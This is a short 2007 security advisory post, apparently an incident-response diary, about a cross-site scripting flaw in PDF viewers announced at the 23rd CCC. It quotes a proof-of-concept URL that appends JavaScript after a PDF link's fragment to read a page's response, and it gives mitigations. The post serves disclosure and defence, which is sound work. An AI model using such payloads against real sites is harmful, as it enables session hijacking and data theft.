PDF XSS vulnerability announced at CCC

Published: 2007-01-03
Last Updated: 2007-01-03 19:25:09 UTC
by Toby Kohlenberg (Version: 2)
0 comment(s)
A new cross-site scripting attack was announced at the 23rd CCC by Stefano Di Paola & Giorgio Fedon:
The gist of the attack is that you are able to get javascript executed by simple having it appended to the PDF's URL.

This is an example (from GNU Citizen): (line breaks added for aesthetic value)

www.google.com/librariancenter/downloads/Tips_Tricks_85×11.pdf#something \
=javascript:function createXMLHttpRequest(){   try{ return new \
ActiveXObject('Msxml2.XMLHTTP');  }catch(e){}   try{ return new \
ActiveXObject('Microsoft.XMLHTTP'); }catch(e){}   try{ return new \
XMLHttpRequest(); }catch(e){}   return null;}var xhr = createXMLHttpRequest(); \
xhr.onreadystatechange = function(){    if (xhr.readyState == 4)       \
alert(xhr.responseText);};xhr.open('GET', 'http://www.google.com', true)\

This doesn't require the ability to write the PDF, just the ability to generate a URL that is based on a
PDF hosted on some site.
There are a number of good explanations on this. I liked this one:

The original paper talks about more than this specific flaw and is certainly worth reading as well.

Mitigation: Turning off javascript seems effective at mitigating this. Militant use of the NoScript extension for
Firefox would be my recommendation. Of course you have to turn off javascript for _everything_ (specifically the target domains, not the website setting up the attack. in the Disenchant examples you would have to disable scripting for Google, MySpace, Microsoft, Ebay and BofA) but....

Update: Thanks to those of you who pointed out that this appears to fail/is fixed in Adobe Acrobat/Reader 8:
0 comment(s)


Diary Archives